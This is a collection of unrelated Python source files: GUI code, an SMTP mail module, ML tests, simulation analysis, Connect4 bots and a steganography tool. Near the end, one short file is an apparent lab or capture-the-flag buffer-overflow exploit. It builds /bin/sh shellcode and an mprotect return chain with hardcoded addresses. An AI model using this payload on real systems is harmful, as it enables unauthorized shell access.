# # do nothing and store all obs
# self.obs_ids_queue = None
#
# else:
#
# self.obs_ids_queue = [None] * self.gui_config.max_num_of_obs_in_memory
#
# if self.obs_ids_queue is None:
# # initialization --> have to check if the given experiment has too many observations, if so, remove them
#
# idx = 0
#
# for run_id, run_data in self.data.runs.items():
#
# if idx < self.gui_config.max_num_of_obs_in_memory and 'observations' in run_data and run_data.observations is not None:
# self.obs_ids_queue[idx] = run_id
# idx = idx + 1
# else:
# run_data['observations'] = None
#
# else:
# if len(self.obs_ids_queue) > self.gui_config.max_num_of_obs_in_memory:
#
# # queue has to be shortened --> erase the connected observations
# for idx in range(self.gui_config.max_num_of_obs_in_memory, len(self.obs_ids_queue)):
# self.data.runs[self.obs_ids_queue[idx]]['observations'] = None
#
# del(self.obs_ids_queue[(self.gui_config.max_num_of_obs_in_memory):len(self.obs_ids_queue)])
#
# elif len(self.obs_ids_queue) < self.gui_config.max_num_of_obs_in_memory:
#
# # queue has to be extended
# self.obs_ids_queue.extend([None] * self.gui_config.max_num_of_obs_in_memory-len(self.obs_ids_queue))
def open_experiment_details(self, run_id):
# load observations if they dont exist
self.load_run_observations(run_id)
for exp_detail_idx in range(len(self.gui_config.detail_views)):
if not self.exp_detail_guis[exp_detail_idx]:
self.open_experiment_detail_window(exp_detail_idx, run_id)
self.update_experiment_detail_guis(run_id)
def open_experiment_detail_window(self, detail_gui_idx, run_id):
detail_config = self.gui_config.detail_views[detail_gui_idx]
if self.exp_detail_guis[detail_gui_idx]:
self.exp_detail_guis[detail_gui_idx].master.destroy()
# load class as defined in config
module_name = '.'.join(detail_config['gui'].split('.')[0:-1])
module = importlib.import_module(module_name)
class_name = detail_config['gui'].split('.')[-1]
gui_class = getattr(module, class_name)
gui_config = detail_config.get('gui_config', [])
self.exp_detail_guis[detail_gui_idx] = gui_class(master=self,
is_dialog=True,
gui_config=gui_config)
self.exp_detail_guis[detail_gui_idx].display_exploration_data(self.data, run_id)
def update_experiment_detail_guis(self, run_id):
self.load_run_observations(run_id)
for exp_detail_gui_idx in range(len(self.gui_config.detail_views)):
if self.exp_detail_guis[exp_detail_gui_idx]:
self.exp_detail_guis[exp_detail_gui_idx].display_exploration_data(self.data, run_id)
def display_data(self):
# remove existing data in treeview
self.tree.delete(*self.tree.get_children())
if len(self.data) > 0:
# add columns for the statistics that should be displayed
stat_names = []
col_names = []
format_strs = []
for statistic_column in self.gui_config.statistic_columns:
stat_name = statistic_column['stat_name']
stat_names.append(stat_name)
name = statistic_column.get('disp_name', stat_name)
col_names.append(name)
format_str = statistic_column.get('format', None)
format_strs.append(format_str)
if col_names:
self.tree['columns'] = tuple(range(len(col_names)))
for col_idx in range(len(col_names)):
self.tree.heading(col_idx, text=col_names[col_idx])
# go through data
for run_data in self.data:
# add columns for the statistics that should be displayed
stat_values = []
for col_idx in range(len(stat_names)):
val = run_data.statistics[stat_names[col_idx]]
if format_strs[col_idx]:
val_str = format_strs[col_idx].format(val)
else:
val_str = str(val)
stat_values.append(val_str)
# show the name of the parameter set if it has one, otherwise its id
if 'name' in run_data:
text = '({}) {}'.format(run_data.id, run_data.name)
else:
text = str(run_data.id)
self.tree.insert('', 'end', run_data.id, text=text, values=stat_values)
def run(self):
self.master.mainloop() |
# import the libs requises
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import logging
from kalliope.core.NeuronModule import NeuronModule
# config
# logging
logging.basicConfig()
logger = logging.getLogger("kalliope")
# création de la class
class Mailsend(NeuronModule):
def __init__(self, **kwargs):
super(Mailsend, self).__init__(**kwargs)
# fix des variables
self.Fromadd = kwargs.get('Fromadd', None) # adresse expediteur
self.MDP = kwargs.get('MDP', None) # mots de passe
self.Toadd = kwargs.get('Toadd', None) # adresse destinataire
self.message = kwargs.get('message', None) # message du mail
self.subject = kwargs.get('subject', None)
Fromadd = self.Fromadd
Toadd = self.Toadd ## Spécification des destinataires
Subject= self.subject
message = MIMEMultipart() ## Création de l'objet "message"
message['From'] = Fromadd ## Spécification de l'expéditeur
message['To'] = Toadd ## Attache du destinataire à l'objet "message"
message['Subject'] = Subject ## Spécification de l'objet de votre mail
msg = self.message ## Message à envoyer
message.attach(MIMEText(msg.encode('utf-8'), 'plain', 'utf-8')) ## Attache du message à l'objet "message", et encodage en UTF-8
serveur = smtplib.SMTP('smtp.gmail.com', 587) ## Connexion au serveur sortant (en précisant son nom et son port)
serveur.starttls() ## Spécification de la sécurisation
serveur.login(Fromadd, self.MDP) ## Authentification
texte= message.as_string().encode('utf-8') ## Conversion de l'objet "message" en chaine de caractère et encodage en UTF-8
serveur.sendmail(Fromadd, Toadd, texte) ## Envoi du mail
serveur.quit() ## Déconnexion du serveur |
import time
exam_st_date = (11, 12, 2014)
print("Retrieving date for examination ...")
time.sleep(1)
print("The exmination will start from :",exam_st_date[0],"/",exam_st_date[1],"/",exam_st_date[2]) |
from braindecode.datasets.pylearn import DenseDesignMatrixWrapper
from braindecode.datahandling.batch_iteration import WindowsIterator
from braindecode.veganlasagne.monitors import WindowMisclassMonitor,\
MonitorManager, CntTrialMisclassMonitor
import numpy as np
import theano.tensor as T
def test_window_misclass_monitor():
inputs = T.ftensor4()
targets = T.ivector()
preds = T.stack((-(T.mean(inputs, axis=(1,2,3)) - 3),
T.mean(inputs, axis=(1,2,3)) - 3,
0.0 * T.mean(inputs, axis=(1,2,3)))).T
loss = T.mean(targets) # some dummy stuff
# should lead to predictions 0,1,1 which should lead to misclass 1/3.0
topo_data = [range(i_trial,i_trial+6) for i_trial in range(3)]
topo_data = np.array(topo_data,dtype=np.float32)[:,np.newaxis,:,np.newaxis]
y = np.int32(range(topo_data.shape[0]))
dataset = DenseDesignMatrixWrapper(topo_view=topo_data, y=y,
axes=('b','c',0,1))
iterator = WindowsIterator(batch_size=7, n_samples_per_window=2,
sample_axes_name=0, n_sample_stride=1)
monitor = WindowMisclassMonitor()
monitor_manager = MonitorManager([monitor])
monitor_manager.create_theano_functions(inputs, targets, preds, loss)
monitor_chans = {'train_misclass': []}
monitor_manager.monitor_epoch(monitor_chans, {'train': dataset}, iterator)
assert np.allclose([1/3.0], monitor_chans['train_misclass'])
def test_cnt_trial_misclass_monitor():
monitor_chans = dict(test_misclass=[])
fake_set = lambda: None
# actually exact targets dont matter..
# just creating 3 trials here in the y signal...
fake_set.y = np.array([[0,0,0,0],[0,0,0,1],[0,0,0,1],[0,0,0,0],
[0,0,1,0],[0,0,1,0],[0,0,0,0],
[0,0,0,0],[1,0,0,0],[1,0,0,0],[0,0,0,0]])
# first batch has two rows
# second has one
all_preds = np.array([
np.array([[0,0.1,0.1,0.8], [0,0.1,0.1,0.8], [0,0.8,0.1,0.1],[0,0.8,0.1,0.1]]),
np.array([[0.8,0.1,0.1,0.1],[0.8,0.1,0.1,0.1]])])
all_targets = np.array([[[0,0,0,1], [0,0,0,1], [0,0,1,0],[0,0,1,0]],
[[1,0,0,0],[1,0,0,0]]])
all_losses=None # ignoring
batch_sizes=[2,1]
monitor = CntTrialMisclassMonitor(input_time_length=1)
monitor.monitor_set(monitor_chans, 'test', all_preds, all_losses,
batch_sizes, all_targets, fake_set)
assert np.allclose(1/3.0, monitor_chans['test_misclass'][-1])
# longer input time length and corresponding padding at start
monitor_chans = dict(test_misclass=[])
fake_set = lambda: None
# actually exact targets dont matter..
# just creating 3 trials here in the y signal...
fake_set.y = np.array([[0,0,0,0],[0,0,0,0],[0,0,0,0],[0,0,0,0],
[0,0,0,1],[0,0,0,1],[0,0,0,0],
[0,0,1,0],[0,0,1,0],[0,0,0,0],
[0,0,0,0],[1,0,0,0],[1,0,0,0],[0,0,0,0]])
# first batch has two rows
# second has one
all_preds = np.array([
np.array([[0,0.1,0.1,0.8], [0,0.1,0.1,0.8], [0,0.8,0.1,0.1],[0,0.8,0.1,0.1]]),
np.array([[0.8,0.1,0.1,0.1],[0.8,0.1,0.1,0.1]])])
all_targets = np.array([[[0,0,0,1], [0,0,0,1], [0,0,1,0],[0,0,1,0]],
[[1,0,0,0],[1,0,0,0]]])
all_losses=None # ignoring
batch_sizes=[2,1]
monitor = CntTrialMisclassMonitor(input_time_length=3)
monitor.monitor_set(monitor_chans, 'test', all_preds, all_losses,
batch_sizes, all_targets, fake_set)
assert np.allclose(1/3.0, monitor_chans['test_misclass'][-1])
# Ignore the predictions on empty targets
# expect it creates 3 outputs per length-2trial
fake_set = lambda: None
# actually exact targets dont matter..
# just creating 3 trials here in the y signal...
fake_set.y = np.array([[0,0,0,0],[0,0,0,0],[0,0,0,0],[0,0,0,0],
[0,0,0,1],[0,0,0,1],[0,0,0,0],
[0,0,1,0],[0,0,1,0],[0,0,0,0],
[0,0,0,0],[1,0,0,0],[1,0,0,0],[0,0,0,0]])
all_preds = np.array([
np.array([[-1,-1,-1,-1], [0,0.1,0.1,0.8], [0,0.1,0.1,0.8],
[-1,-1,-1,-1], [0,0.8,0.1,0.1],[0,0.8,0.1,0.1]]),
np.array([[-1,-1,-1,-1],[0.8,0.1,0.1,0.1],[0.8,0.1,0.1,0.1]])])
all_targets = np.array([[[0,0,0,0], [0,0,0,1], [0,0,0,1],
[0,0,0,0], [0,0,1,0],[0,0,1,0]],
[[0,0,0,0], [1,0,0,0],[1,0,0,0]]])
all_losses=None # ignoring
batch_sizes=[2,1]
monitor = CntTrialMisclassMonitor(input_time_length=3)
monitor.monitor_set(monitor_chans, 'test', all_preds, all_losses,
batch_sizes, all_targets, fake_set)
assert np.allclose(1/3.0, monitor_chans['test_misclass'][-1]) |
# -*- coding=utf-8 -*-
from xlhelper import ExcelReader, fields
import pprint
field_descs = (
fields.Int(xl_name=u'加盟商ID', key='ops_org_id', required=True,
nullable=False),
fields.Str(xl_name=u'加盟商名称', key='org_name', required=True,
nullable=False),
fields.Float(xl_name=u'金额', key='amount', required=True,
nullable=False, as_decimal=True),
fields.Str(xl_name=u'备注', key='remark', required=True,
nullable=True, default='')
)
reader = ExcelReader(
filename='/Users/henry/Desktop/线下申款测试数据-加盟商.xlsx')
try:
rv = reader.parse_sheet_data(field_descs)
pprint.pprint(rv)
except Exception as e:
import traceback
traceback.print_exc()
import ipdb
ipdb.set_trace()
|
def fib(n):
if n == 0:
return 1
if n == 1:
return 1
else:
return fib(n-1)+fib(n-2)
for i in range(31):
print "the %s th term of the fibonacci sequence is %s" %(i,fib(i))
|
class Solution(object):
def findDuplicate(self, nums):
"""
learned floyd cycle detection. had no idea this can solved like this.
"""
tortoise = hare = nums[0]
while True:
tortoise = nums[tortoise]
hare = nums[nums[hare]]
if hare == tortoise:
break
tortoise = nums[0]
while hare != tortoise:
tortoise = nums[tortoise]
hare = nums[hare]
return hare |
# Copyright 2010 Alon Zakai ('kripken'). All rights reserved.
# This file is part of Syntensity/the Intensity Engine, an open source project. See COPYING.txt for licensing.
"""
Handles authentication, both of the server instance to the master server,
and of clients to this server.
"""
from intensity.logging import *
class InstanceStatus:
in_standby = False ##!< Standby mode means we need to be manually repurposed - we don't
##!< automatically start a new map if the master update tells us that
##!< This is important after a server crash - don't want to immediately
##!< restart the same map, it might be a crash on load, leading to a loop
##! A server is run in local mode when its address is 'localhost'
##! In this mode, an instance will only let a single client connect to it,
##! from the same machine. This is useful for editing (stuff like heightmaps etc.
##! only work in this mode, they are not available in multiplayer())
local_mode = False
##! Private edit mode means that only a single client may connect to this instance
##! (which can then, like with local mode, use heightmaps etc.).
private_edit_mode = False
map_loaded = False
def get_instance_id():
return str(get_config("Network", "instance_id", ''))
def get_instance_validation():
return str(get_config('Network', 'instance_validation', ''))
def get_instance_address():
return str(get_config('Network', 'address', 'localhost'))
def check_local_mode():
InstanceStatus.local_mode = (get_instance_address() == 'localhost')
return InstanceStatus.local_mode
## Contacts the master server with a status update about this server. The
## response tells us what map we should be running
def update_master(params={}, act=True):
log(logging.DEBUG, "Updating master...")
if get_config('Activity', 'force_location', '') == '':
try:
params.update({
'version': INTENSITY_VERSION_STRING,
'user_interface': get_instance_address() + ':' + str(get_config('Network', 'port', '28787')),
'admin_interface': get_instance_address() + ':' + str(get_config('Network', 'admin_port', '28789')),
# 'instance_id': get_instance_id(),
'activity_id': get_curr_activity_id(),
'map_asset_id': get_curr_map_asset_id(),
'validation': get_instance_validation(),
'players': Clients.count(),
'max_players': get_max_clients(),
})
response = contact_master("instance/update", params)
except MasterNetworkError, e:
log(logging.DEBUG, "Error in updating master: %s" % (str(e)))
return # No biggie, in general, hope to succeed next time...
else:
response = {}
if 'instance_id' in response:
set_config('Network', 'instance_id', response['instance_id'])
# This update has been like a login - save our info
get_master_session().set_info(response['instance_id'], response['session_id'])
forced = get_config('Activity', 'force_activity_id', '') != '' or get_config('Activity', 'force_map_asset_id', '') != '' or get_config('Activity', 'force_location', '') != ''
if InstanceStatus.in_standby:
log(logging.WARNING, "In standby mode, not even considering loading a map")
return
if act and not InstanceStatus.map_loaded and forced:
def do_set_map():
set_map(get_config('Activity', 'force_activity_id', ''), get_config('Activity', 'force_map_asset_id', ''))
main_actionqueue.add_action(do_set_map)
if act and 'activity_id' in response and 'map_asset_id' in response and not forced:
log(logging.DEBUG, "Master server requests us to change map")
def do_set_map():
set_map(response['activity_id'], response['map_asset_id'])
main_actionqueue.add_action(do_set_map)
## Uploads an error log to the master, e.g., after a crash
def upload_error_log(error_log):
update_master(act=False) # So we know our instance_id
try:
response = contact_master(
"instance/uploadlog",
{
'instance_id': get_instance_id(),
'error_log': error_log,
},
POST=True
)
except MasterNetworkError, e:
print "Error in updating master: %s" % (str(e))
return False
return True
## @return False if failed, or a dictionary with 'username' and 'can_edit'
def check_login(code):
if check_local_mode(): return {};
# The code is an OTP, used to identify and verify the client
try:
response = contact_master(
"user/checklogin",
{
'instance_id': get_instance_id(),
'code': code
}
)
except MasterNetworkError, e:
log(logging.ERROR, "Error in contacting master to check login: %s" % (str(e)))
return False
if response['success'] == '1':
return response
else:
return False
# Prevent loops
from intensity.master import *
from intensity.server.persistence import *
from intensity.world import *
|
import socket
import datetime
from dateutil import parser
from timeit import default_timer as timer
HOST = '127.0.0.1'
PORT = 8080
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
request_time = timer()
server_time = parser.parse(s.recv(1024).decode())
response_time = timer()
actual_time = datetime.datetime.now()
print("Clock server time: ", str(server_time))
delay = response_time - request_time
print("Process delay latency: ", str(delay))
print("Actual client time: ", str(actual_time))
# synchronizing client time with clock server
client_time = server_time + datetime.timedelta(seconds=(delay / 2))
print("After synchronizing new client time: ", str(client_time))
error = actual_time - client_time
print("Synchronization error: ", str(error.total_seconds()), " seconds")
s.close()
|
import numpy as np
def softmax(x):
"""Compute softmax values for x."""
return(np.exp(x)/np.sum(np.exp(x), axis = 0))
scores = [3.0, 1.0,0.2]
print(softmax(scores))
# Plot softmax curves
import matplotlib.pyplot as plt
x = np.arange(-2.0, 6.0, 0.1)
scores = np.vstack([x, np.ones_like(x), 0.2 * np.ones_like(x)])
# plt.plot(x, softmax(scores).T, linewidth=2)
# plt.show()
# Show that the sum at each point is equal to one
# beside being aware of errors occuring by rounding of.
a = sum(softmax(scores))
print((a>0.999).all() & (a<=1.001).all()) |
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""A simple utility for constructing filesystem-like trees from beets
libraries.
"""
from collections import namedtuple
from beets import util
Node = namedtuple('Node', ['files', 'dirs'])
def _insert(node, path, itemid):
"""Insert an item into a virtual filesystem node."""
if len(path) == 1:
# Last component. Insert file.
node.files[path[0]] = itemid
else:
# In a directory.
dirname = path[0]
rest = path[1:]
if dirname not in node.dirs:
node.dirs[dirname] = Node({}, {})
_insert(node.dirs[dirname], rest, itemid)
def libtree(lib):
"""Generates a filesystem-like directory tree for the files
contained in `lib`. Filesystem nodes are (files, dirs) named
tuples in which both components are dictionaries. The first
maps filenames to Item ids. The second maps directory names to
child node tuples.
"""
root = Node({}, {})
for item in lib.items():
dest = item.destination(fragment=True)
parts = util.components(dest)
_insert(root, parts, item.id)
return root
|
t = int(input())
for _ in range(t):
n = int(input())
s = 1
# div by 2 by skipping 2
for i in range(3, 2*n+1):
s = (s * i) % 1000000007
print(s)
|
#!/usr/bin/python
from bitstring import BitArray, BitStream
import hashlib
import Image
import sys
from util import getKey, getImageData
def getText(file):
text = open(file, "rb").read()
return text
def loadImage(input, output, text, key):
img = Image.open(input)
# TODO - assert RGB/RGBA
print img.mode
#text = "Hello World!"
bits = BitArray(bytes=text)
lbits = BitArray(hex(bits.len))
lbits.prepend(32 - lbits.len)
print text
print bits.bin
print lbits.bin
# print bits[1] & 1
data = img.getdata()
# print len(data)
counter = 0
newdata = []
for i in data:
c = counter - lbits.len
p = counter % len(key)
if (counter < lbits.len):
q = (key[p] ^ (lbits[counter] & 1))
newdata.append((i[0] ^ q,i[1],i[2],255))
elif (c < bits.len):
q = (key[p] ^ (bits[c] & 1))
# print "q:" + str(q) + " ,i:" + str(i[0]) + " ,i ^ q:" + str(i[0] ^ q)
newdata.append((i[0] ^ q,i[1],i[2],255))
else:
newdata.append((i[0],i[1],i[2],255))
counter += 1
# for i in newdata:
# print i
img.putdata(newdata)
img.save(output)
def main(argv):
pw = argv[0]
txtfile = argv[1]
inputImage = argv[2]
outputImage = argv[3]
key = getKey(pw)
text = getText(txtfile)
print "Input img: " + inputImage
print "Output img: " + outputImage
print "Text: " + text
print "pass: " + pw
print "Key: " + key.hex
loadImage(inputImage,outputImage,text,key)
if __name__ == "__main__":
main(sys.argv[1:])
|
import h5py
import numpy as np
def save_dict(elements, outputfile):
"""
Save the ADAS data to an HDF5 file.
"""
with h5py.File(outputfile, 'w') as f:
_save_internal(elements, f)
def _save_internal(dct, f, path=''):
"""
Internal function for saving data to HDF5.
"""
for k in dct.keys():
if type(dct[k]) == dict:
o = f.create_group(k)
_save_internal(dct[k], o, path=path+'/'+k)
elif type(dct[k]) == float:
f.create_dataset(k, (1,), data=dct[k])
elif type(dct[k]) == int:
f.create_dataset(k, (1,), data=dct[k], dtype='i8')
elif type(dct[k]) == float:
v = 1 if dct[k] else 0
f.create_dataset(k, (1,), data=v, dtype='i4')
elif type(dct[k]) == str:
dset = f.create_dataset(k, (1,), dtype='S'+str(len(dct[k])))
dset[0:l] = np.string_(dct[k])
elif type(dct[k]) == list:
f.create_dataset(k, (len(dct[k]),), data=dct[k])
elif type(dct[k]) == np.ndarray:
f.create_dataset(k, dct[k].shape, data=dct[k])
else:
raise Exception("Unrecognized data type of entry '{}/{}': {}.".format(path, k, type(dct[k])))
|
# audio manipulation functions
from audiocore import RawSample
from audiopwmio import PWMAudioOut as AudioOut
class EAudio:
def __init__(self):
import array
self.audio = AudioOut(board.SPEAKER)
self.SAMPLE_RATE = 8000
self.sampleWave = array.array("H", [0] * self.SAMPLE_RATE)
print(len(self.sampleWave))
def enableSpeaker(self):
self.speaker_enable = digitalio.DigitalInOut(board.SPEAKER_ENABLE)
self.speaker_enable.direction = digitalio.Direction.OUTPUT
self.speaker_enable.value = True
def genSineWave(self):
import math
FREQUENCY = 440 # 440 Hz middle 'A'
#for i in range(self.SAMPLE_RATE):
# self.sampleWave[i] = int(math.sin(math.pi * 2 * i / 18) * (2 ** 15) + 2 ** 15)
def playWave(self):
# Keep playing the sample over and over, for 1 second
self.audio.play(self.sampleWave, loop=True)
time.sleep(1)
self.audio.stop()
def play_file(filename):
print("Playing file: " + filename)
self.sampleWave = open(filename, "rb")
with WaveFile(wave_file) as wave:
with AudioOut(board.SPEAKER) as audio:
audio.play(wave)
while audio.playing:
pass
print("Finished")
|
import numpy as np
import h5py
import os
import pickle
Targs = ['N0C0_CN', 'N0C1_CN', 'N0C2_CN', 'N1C0_CN', 'N1C1_CN', 'N1C2_CN',\
'N2C0_CN','N2C1_CN','N2C2_CN']
#Targs = ['Ca']
print('Targs[0]: ', Targs[0])
input_lm_files = ['_prerun_result.lm','_stimrun_result.lm']
input_lm_folder = 'lms'
input_lm_files = ['_prerun_result.lm',\
'_stimrun_00.lm',\
'_stimrun_01.lm',\
'_stimrun_02.lm',\
'_stimrun_03.lm',\
'_stimrun_04.lm',\
'_stimrun_05.lm',\
'_stimrun_06.lm',\
'_stimrun_07.lm',\
'_stimrun_08.lm',\
'_stimrun_09.lm',\
'_stimrun_10.lm',\
'_stimrun_11.lm',\
'_stimrun_12.lm',\
'_stimrun_13.lm',\
'_stimrun_14.lm',\
'_stimrun_15.lm',\
'_stimrun_16.lm',\
'_stimrun_17.lm',\
'_stimrun_18.lm',\
'_stimrun_19.lm',\
'_stimrun_20.lm',\
'_stimrun_21.lm',\
'_stimrun_22.lm',\
'_stimrun_23.lm',\
'_stimrun_24.lm',\
'_stimrun_25.lm']
input_label_file = "lm_annot/labels.hdf5"
output_figfile_prefix = "Stim_Spine_"
output_figfile_dir = 'figs'
## Offscreen rendering
# mlab.options.offscreen = True
## Decode molecular names and volume
cyt = 1
NA = 6.022e23
f = h5py.File( input_lm_folder + os.sep + input_lm_files[0],'r')
data = f['Model']['Diffusion']['LatticeSites'][()]
num_voxels = np.count_nonzero(data == cyt)
Spacing = f['Model']['Diffusion'].attrs['latticeSpacing']
volume_in_L = num_voxels * Spacing * Spacing * Spacing * 1000
## Decode molecular names
mnames = f['Parameters'].attrs['speciesNames'].decode().split(',')
S = {}
for i in range(len(mnames)):
S[mnames[i]] = i+1
f.close()
## Load spine labels
with h5py.File(input_label_file,'r') as f:
labels = f['dendrite'][()]
ids_spine, nums_spine_voxels = np.unique(labels, return_counts=True)
ids_spine = ids_spine[1:-2]
nums_spine_voxels = nums_spine_voxels[1:-2]
# ids_spine = ids_spine[::4]
# nums_spine_voxels = nums_spine_voxels[::4]
vols_spine_in_L = nums_spine_voxels * Spacing * Spacing * Spacing * 1000
print('ids_spine: ', ids_spine)
_labels = labels
nx,ny,nz = _labels.shape
min_lattice_size = 32
lx = np.ceil(1.0*nx/min_lattice_size)*min_lattice_size
ly = np.ceil(1.0*ny/min_lattice_size)*min_lattice_size
lz = np.ceil(1.0*nz/min_lattice_size)*min_lattice_size
lx = lx.astype(np.int)
ly = ly.astype(np.int)
lz = lz.astype(np.int)
labels = np.zeros((lx,ly,lz), dtype=np.int)
labels[:nx,:ny,:nz] = _labels
labels = labels.flatten()
with open('lm_annot/list.pickle','rb') as f:
list = pickle.load(f)
cols = []
for id_spine in ids_spine:
c = [x for x in list['list'] if x['id'] == id_spine]
r = c[0]['r']/256.0
g = c[0]['g']/256.0
b = c[0]['b']/256.0
cols.append((r,g,b))
## Obtain timepoints
Timepoints = [0]
for i, lmfile in enumerate(input_lm_files):
filename = input_lm_folder + os.sep + lmfile
#print('file :', filename)
hfile = h5py.File(filename, 'r')
tmp = hfile['Simulations']['0000001']['LatticeTimes'][()]
hfile.close
tmp = tmp + Timepoints[-1]
tmp = tmp.tolist()
Timepoints.extend(tmp[1:])
Timepoints = Timepoints[1:]
# print('Timepoints: ',Timepoints)
## Obtain molecular concs of spines at each timepoint
num_molecules_spine = []
for i, lmfile in enumerate(input_lm_files):
filename = input_lm_folder + os.sep + lmfile
print('file :', filename)
hfile = h5py.File(filename, 'r')
Frames = [key for key in hfile['Simulations']['0000001']['Lattice'].keys()]
Frames.sort()
Frames.pop(0)
for f in Frames:
particles = hfile['Simulations']['0000001']['Lattice'][f][:,:,:,:]
num_molecules_spine_time_i = []
for id_spine in ids_spine:
tmp_num = 0
targ_spine_label = (labels == id_spine)
for j in range(particles.shape[3]):
p = particles[:,:,:,j].flatten()
pp = p[targ_spine_label]
for Targ in Targs:
tmp_num += np.count_nonzero( pp == S[Targ] )
num_molecules_spine_time_i.append(tmp_num)
print('num_molecules_spine_time_i: ', num_molecules_spine_time_i)
num_molecules_spine.append(num_molecules_spine_time_i)
hfile.close
num_molecules_spine = np.array(num_molecules_spine)
print()
uMs = num_molecules_spine / NA * 1e6 / vols_spine_in_L
toffset = 20
t = np.array(Timepoints[:])-toffset
np.savez('num_molecules_spine_'+Targs[0]+'.npz', t=t, num_molecules_spine=num_molecules_spine)
# tmp = np.load('num_molecules_spine.npz')
# num_molecules_spine = tmp['num_molecules_spine']
import matplotlib.pyplot as plt
fig = plt.figure(figsize=(6,4))
ax=fig.add_subplot(111)
#for i, id_spine in enumerate(ids_spine):
# ax.plot(Timepoints, num_molecules_spine[:,i], label=str(id_spine), color=cols[i] )
for i, id_spine in enumerate(ids_spine):
ax.plot(t, uMs[:,i], label=str(id_spine), color=np.random.rand(3,) )
ax.set_position([0.2,0.2,0.7,0.6])
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.set_xlim([-2.5,12.5])
plt.title(Targ)
plt.xlabel('Time (s)')
plt.ylabel('Conc (uM)')
#plt.ylabel('Number')
hans, labs = ax.get_legend_handles_labels()
ax.legend(handles=hans,labels=labs, frameon=False)
plt.savefig(output_figfile_dir+'/'+ output_figfile_prefix + Targs[0] + '.pdf')
plt.savefig(output_figfile_dir+'/'+ output_figfile_prefix + Targs[0] + '.png',dpi=150)
plt.show()
|
# Name: David Adams
# CMS cluster login name: dmadams
'''
final_players.py
This module contains code for various bots that play Connect4 at varying
degrees of sophistication.
'''
import random
from Connect4Simulator import *
class RandomPlayer:
'''
This player makes one of the possible moves on the game board,
chosen at random.
'''
def chooseMove(self, board, player):
'''
Given the current board and player number, choose and return a move.
Arguments:
board -- a Connect4Board instance
player -- either 1 or 2
Precondition: There must be at least one legal move.
Invariant: The board state does not change.
'''
assert player in [1, 2]
possibles = board.possibleMoves()
assert possibles != []
return random.choice(possibles)
class SimplePlayer:
'''
This player will always play a move that gives it a win if there is one.
Otherwise, it picks a random legal move.
'''
def chooseMove(self, board, player):
'''
Given the current board and player number, choose and return a move.
Arguments:
board -- a Connect4Board instance
player -- either 1 or 2
Precondition: There must be at least one legal move.
Invariant: The board state does not change.
'''
assert player in [1, 2]
p = board.possibleMoves()
for col in p:
if board.isWinningMove(col, player):
return col
return random.choice(p)
class BetterPlayer:
'''
This player will always play a move that gives it a win if there is one.
Otherwise, it tries all moves, collects all the moves which don't allow
the other player to win immediately, and picks one of those at random.
If there is no such move, it picks a random move.
'''
def chooseMove(self, board, player):
'''
Given the current board and player number, choose and return a move.
Arguments:
board -- a Connect4Board instance
player -- either 1 or 2
Precondition: There must be at least one legal move.
Invariant: The board state does not change.
'''
assert player in [1, 2]
p = board.possibleMoves()
if len(p) == 1:
return p[0]
win = []
bad = []
good = []
board2 = board.clone()
for col in p:
if board.isWinningMove(col, player):
win.append(col)
board2.makeMove(col, player)
for col2 in board2.possibleMoves():
if board2.isWinningMove(col2, 3 - player):
bad.append(col)
board2.unmakeMove(col)
for c in p:
if c not in bad:
good.append(c)
if len(win) > 0:
return random.choice(win)
if len(good) > 0:
return random.choice(good)
return random.choice(p)
class Monty:
'''
This player will randomly simulate games for each possible move,
picking the one that has the highest probability of success.
'''
def __init__(self, n, player):
'''
Initialize the player using a simpler computer player.
Arguments:
n -- number of games to simulate.
player -- the computer player
'''
assert n > 0
self.player = player
self.n = n
def chooseMove(self, board, player):
'''
Given the current board and player number, choose and return a move.
Arguments:
board -- a Connect4Board instance
player -- either 1 or 2
Precondition: There must be at least one legal move.
Invariant: The board state does not change.
'''
assert player in [1, 2]
p = board.possibleMoves()
move = p[0]
wins = 0
most_wins = 0
for col in p:
if board.isWinningMove(col, player):
move = col
break
board.makeMove(col, player)
for i in range(self.n):
sim = Connect4Simulator(board.clone(), self.player, \
self.player, 3 - player)
result = sim.simulate()
if result == player:
wins += 1
if wins > most_wins:
most_wins = wins
move = col
board.unmakeMove(col)
wins = 0
return move
|
"""
helloworld.py
Author: xXxXxNimbleNavigatorxXxXx
Credit: kezarburgar
Assignment:Hello, world
Write and submit a Python program that prints the following:
Hello, world!
"""
print ("Hello, world!")
|
from _typeshed import Incomplete
from collections.abc import Generator
def bfs_beam_edges(
G, source, value, width: Incomplete | None = None
) -> Generator[Incomplete, Incomplete, Incomplete]: ...
|
#!/usr/bin/python
import struct
def p(x):
return struct.pack('<L',x)
PAYLOAD="jhh\x2f\x2f\x2fsh\x2fbin\x89\xe31\xc9j\x0bX\x99\xcd\x80"
BUFFER_ADDRESS=0xbffff730
BUFFER_ADDRESS_ALIGNED=0xbffff000
payload = ""
payload += PAYLOAD
while len(payload) < 32 + 4*3: # name size + arguments
payload += "B"
payload += p(0x080523E0) # mprotect
payload += p(BUFFER_ADDRESS) # Jump to shellcode
payload += p(BUFFER_ADDRESS_ALIGNED)
payload += p(0x1000) # 4096
payload += p(0x7) # PROT_READ|PROT_WRITE|PROT_EXEC
print payload
|
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 7 00:08:24 2021
@author: User
"""
import pandas as pd
data=pd.read_json('contacts.json')
data['email_len']=data['Email'].apply(lambda x:len(x))
data['phone_len']=data['Phone'].apply(lambda x:len(x))
data['order_len']=data['OrderId'].apply(lambda x:len(x))
email=data[data['email_len']!=0][['Email','Id']]
order=data[data['order_len']!=0][['OrderId','Id']]
phone=data[data['phone_len']!=0][['Phone','Id']]
ep=data[(data['email_len']!=0)&(data['phone_len']!=0)][['Email','Phone','Id']]
eo=data[(data['email_len']!=0)&(data['order_len']!=0)][['Email','OrderId','Id']]
po=data[(data['phone_len']!=0)&(data['order_len']!=0)][['Phone','OrderId','Id']]
eoe=pd.merge(eo,email,how='right',on=['Email'])
eoo=pd.merge(eo,order,how='right',on=['OrderId'])
epe=pd.merge(ep,email,how='right',on=['Email'])
